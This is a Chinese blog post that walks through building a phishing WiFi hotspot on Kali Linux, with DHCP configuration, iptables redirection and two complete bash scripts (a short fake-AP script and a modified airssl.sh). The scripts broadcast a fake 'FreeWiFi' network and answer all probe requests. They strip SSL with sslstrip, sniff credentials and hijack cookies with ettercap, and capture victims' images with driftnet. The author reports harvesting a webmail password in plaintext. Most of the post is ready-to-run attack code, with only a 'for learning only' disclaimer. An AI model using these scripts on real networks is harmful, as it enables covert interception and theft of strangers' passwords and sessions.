钓鱼WIFI搭建

钓鱼WIFI搭建

1、无线网卡

2、KaliLinux操作系统,这里就不用说了,必备的

3、isc-dhcp-server服务器。安装好KaliLinux后只需要apt-get update 然后apt-get install isc-dhcp-server即可

4、Aircrack-ng套件   #用来发送数据

5、sslstrip       用来突破SSL加密

6、ettercap     用来嗅探劫持

 

后面三个软件KaliLinux都自带有,不用安装即可。

首先强调下,后面的bash脚本适用于使用isc-dhcp-server这个bash脚本,建立钓鱼热点。

 

安装dhcp服务

apt-get install isc-dhcp-server

配置文件分别在/etc/default/isc-dhcp-server和/etc/dhcp/dhcpd.conf,前者可以配置监听端口,这里以wlan0为例

配置dhcp文件后,断开wlan0的网络,分配一个ip

ifconfig wlan0 192.168.1.2/24

 

启动dhcp服务

/etc/init.d/isc-dhcp-server start 或者

service isc-dhcp-server start

 

建立热点:

将下文写好的airssl.sh添加执行权限

bash airssl.sh

然后分别是AP建立,DHCP建立,sslstrip开启,ettercap开启。

这里再介绍一种方法,是使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!

所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:
Aircrack-ng 套件    #用来发送数据
isc-dhcp-server    #简单的dhcp服务器
sslstrip       #突破ssl加密
ettercap      #嗅探劫持

leaf /etc/dhcp/dhcpd.conf   编辑dhcp服务器配置文件,修改如下:

authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "FreeWiFi";
option domain-name-servers 10.0.0.1;

range 10.0.0.10 10.0.0.100;

}

然后激活网卡至监听模式:
airmon-ng start wlan0
airbase-ng -e FreeWiFi -c 6 mon0
此时虚拟wifi的信号已经发送出去了,如果出现错误:
Error: Got channel -1, expected a value > 0.
执行如下命令:

airmon-ng stop mon0

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

然后从激活网卡至监听模式那里重新开始。
接着执行如下命令:

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

虚拟WiFir热点创建成功,接下来就是嗅探欺骗钓鱼了:

sslstrip -fpk 10000
ettercap -Tpuqi at0

然后就等着鱼儿上钩吧!

手机上测试了下,网易邮箱直接明文密码:

Kali-Linux下创建一个钓鱼WiFi热点 - xiao106347 - Linux 折腾笔记

 
百度使用了加密:

Kali-Linux下创建一个钓鱼WiFi热点 - xiao106347 - Linux 折腾笔记

 

Kali-Linux下创建一个钓鱼WiFi热点 - xiao106347 - Linux 折腾笔记

 写了一个脚本,修改成自己的设置每次执行就ok了:
复制下面代码,保存为 “Fake_a_ap.sh”,然后 chmod +x Fake_a_ap.sh && ./Fake_a_ap.sh 

#!/bin/sh

echo "即将创建WiFi热点,请确保dhcpd.conf已经配置好!" &
sleep 5

ifconfig wlan0 down #wlan0修改成你的网卡
iwconfig wlan0 mode monitor
ifconfig wlan0 up

airmon-ng start wlan0 &
sleep 5 
airbase-ng -FreeWiFi -6 mon0 & #修改成自己的热点名称和信道
sleep 5

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush && iptables --table nat --flush && iptables --table nat --flush && iptables --table nat --delete-chain &

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sleep 2
/etc/init.d/isc-dhcp-server start &
sleep 5
sslstrip -fpk 10000 &
ettercap -puTqi at0

 

 

代码如下:

 

#!/bin/bash  
# 修改版,原版信息如下:  
########################################################  
# ©opyright 2009 - killadaninja - Modified G60Jon 2010  
# airssl.sh - v1.0  
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh  
########################################################  
# Network questions  
echo "AIRSSL_KALI"  
echo "修该版本,适用于kali或者使用isc-dhcp-server的环境,原版信息如下:"  
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "  
echo "仅供学习用途"  
echo  
route -n -A inet | grep UG  
echo "DNS服务器.例如8.8.8.8: "  
read -e dnsip  
echo "网关地址.例如192.168.0.1:"  
read -e gatewayip  
echo "接入internet的接口.例如eth1: "  
read -e internet_interface  
echo "用于建立AP的接口.例如wlan0: "  
read -e fakeap_interface  
echo "AP的ESSID: "  
read -e ESSID  
airmon-ng start $fakeap_interface  
fakeap=$fakeap_interface  
fakeap_interface="mon0"  
  
# Dhcpd creation  
mkdir -p "/pentest/wireless/airssl"  
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bak  
cp /etc/default/isc-dhcp-server /etc/default/isc-dhcp-server.bak  
echo "ddns-update-style none;  
default-lease-time 600;  
max-lease-time 7200;  
authoritative;  
log-facility local7;  
">/etc/dhcp/dhcpd.conf  
  
echo -n "subnet 192.168.0.0 netmask 255.255.255.0 {  
  range 192.168.0.100 192.168.0.200;   
  option domain-name-servers ">>/etc/dhcp/dhcpd.conf  
echo -n $dnsip>>/etc/dhcp/dhcpd.conf  
echo -n ";  
# option domain-name "internal.example.org";  
  option routers ">>/etc/dhcp/dhcpd.conf  
echo -n $gatewayip>>/etc/dhcp/dhcpd.conf  
echo -n ";  
  option broadcast-address 192.168.0.255;  
 default-lease-time 600;  
 max-lease-time 7200;  
}" >> /etc/dhcp/dhcpd.conf  
echo "  
DHCPD_CONF=/etc/dhcp/dhcpd.conf  
DHCPD_PID=/var/run/dhcpd.pid  
INTERFACES="at0"  
">/etc/default/isc-dhcp-server  
# Fake ap setup  
echo "[+] Configuring FakeAP...."  
echo  
echo "Airbase-ng will run in its most basic mode, would you like to  
configure any extra switches? "  
echo  
echo "Choose Y to see airbase-ng help and add switches. "  
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "  
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "  
echo "Y, N or A "  
  
read ANSWER  
  
if [ $ANSWER = "y" ] ; then  
airbase-ng --help  
fi  
  
if [ $ANSWER = "y" ] ; then  
echo  
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be  
redefined, also in this mode you MUST define a channel "  
read -e aswitch  
echo  
echo "[+] Starting FakeAP..."  
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!  
sleep 2  
fi  
  
if [ $ANSWER = "a" ] ; then  
echo  
echo "[+] Starting FakeAP..."  
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!  
sleep 2  
fi  
  
if [ $ANSWER = "n" ] ; then  
echo  
echo "[+] Starting FakeAP..."  
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!  
sleep 2  
fi  
  
# Tables  
echo "[+] Configuring forwarding tables..."  
ifconfig lo up  
ifconfig at0 up &  
sleep 1  
ifconfig at0 $gatewayip netmask 255.255.255.0  
ifconfig at0 mtu 1400  
route add -net 192.168.0.0 netmask 255.255.255.0 gw $gatewayip   
iptables --flush  
iptables --table nat --flush  
iptables --delete-chain  
iptables --table nat --delete-chain  
echo 1 > /proc/sys/net/ipv4/ip_forward  
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip  
iptables -P FORWARD ACCEPT  
iptables --append FORWARD --in-interface at0 -j ACCEPT  
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE  
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000  
  
# DHCP  
echo "[+] Setting up DHCP..."  
#touch /var/run/dhcpd.pid  
#chown dhcpd:dhcpd /var/run/dhcpd.pid  
#xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!  
#sleep 3  
/etc/init.d/isc-dhcp-server start  
# Sslstrip  
echo "[+] Starting sslstrip..."  
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!  
sleep 2  
  
# Ettercap  
echo "[+] Configuring ettercap..."  
echo  
echo "Ettercap will run in its most basic mode, would you like to  
configure any extra switches for example to load plugins or filters,  
(advanced users only), if you are unsure choose N "  
echo "Y or N "  
read ETTER  
if [ $ETTER = "y" ] ; then  
ettercap --help  
fi  
  
if [ $ETTER = "y" ] ; then  
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here  
For the sake of airssl, ettercap WILL USE -u and -p so you are advised  
NOT to use -M, also -i is already set and CANNOT be redifined here.  
Ettercaps output will be saved to /pentest/wireless/airssl/passwords  
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "  
echo  
read "eswitch"  
echo "[+] Starting ettercap..."  
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!  
sleep 1  
fi  
  
if [ $ETTER = "n" ] ; then  
echo  
echo "[+] Starting ettercap..."  
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!  
sleep 1  
fi  
  
# Driftnet  
echo  
echo "[+] Driftnet?"  
echo  
echo "Would you also like to start driftnet to capture the victims images,  
(this may make the network a little slower), "  
echo "Y or N "  
read DRIFT  
  
if [ $DRIFT = "y" ] ; then  
mkdir -p "/pentest/wireless/airssl/driftnetdata"  
echo "[+] Starting driftnet..."  
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!  
sleep 3  
fi  
  
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!  
  
clear  
echo  
echo "[+] Activated..."  
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "  
echo  
echo "[+] IMPORTANT..."  
echo "使用完毕请键入Y恢复系统配置,否则可能会出现问题!"  
read WISH  
  
# Clean up  
if [ $WISH = "y" ] ; then  
echo  
echo "[+] Cleaning up airssl and resetting iptables..."  
  
kill ${fakeapid}  
kill ${dchpid}  
kill ${sslstripid}  
kill ${ettercapid}  
kill ${dritnetid}  
kill ${sslstriplogid}  
  
airmon-ng stop $fakeap_interface  
airmon-ng stop $fakeap  
echo "0" > /proc/sys/net/ipv4/ip_forward  
iptables --flush  
iptables --table nat --flush  
iptables --delete-chain  
iptables --table nat --delete-chain  
mv /etc/default/isc-dhcp-server.bak /etc/default/isc-dhcp-server  
mv /etc/dhcp/dhcpd.conf.bak /etc/dhcp/dhcpd.conf  
/etc/init.d/isc-dhcp-server stop   
  
echo "[+] Clean up successful..."  
echo "[+] Thank you for using airssl, Good Bye..."  
exit  
  
fi  
exit  

 

posted @ 2018-01-10 19:25 journeyIT 阅读( ...) 评论( ...) 编辑 收藏
  • 5
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值